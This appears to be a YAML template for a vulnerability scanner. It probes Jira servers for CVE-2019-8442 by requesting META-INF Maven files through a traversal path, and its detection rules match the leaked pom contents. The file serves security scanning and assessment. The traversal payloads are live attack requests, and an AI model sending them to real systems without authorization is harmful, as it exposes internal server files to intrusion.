id: jira-webroot-traversal
info:
  name: Jira WebRoot Traversal (CVE-2019-8442)
  risk: Low

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '8080'
  prefixes: 'jira, wiki, confluence'

variables:
  - endpoint: |
      s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
      s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "<groupId>") && StringSearch('body', '<artifactId>')


references:
  - links:
      - https://jira.atlassian.com/browse/JRASERVER-69241
      - https://www.contrastsecurity.com/security-influencers/i-made-600-with-contrast-ce-cve-2019-8442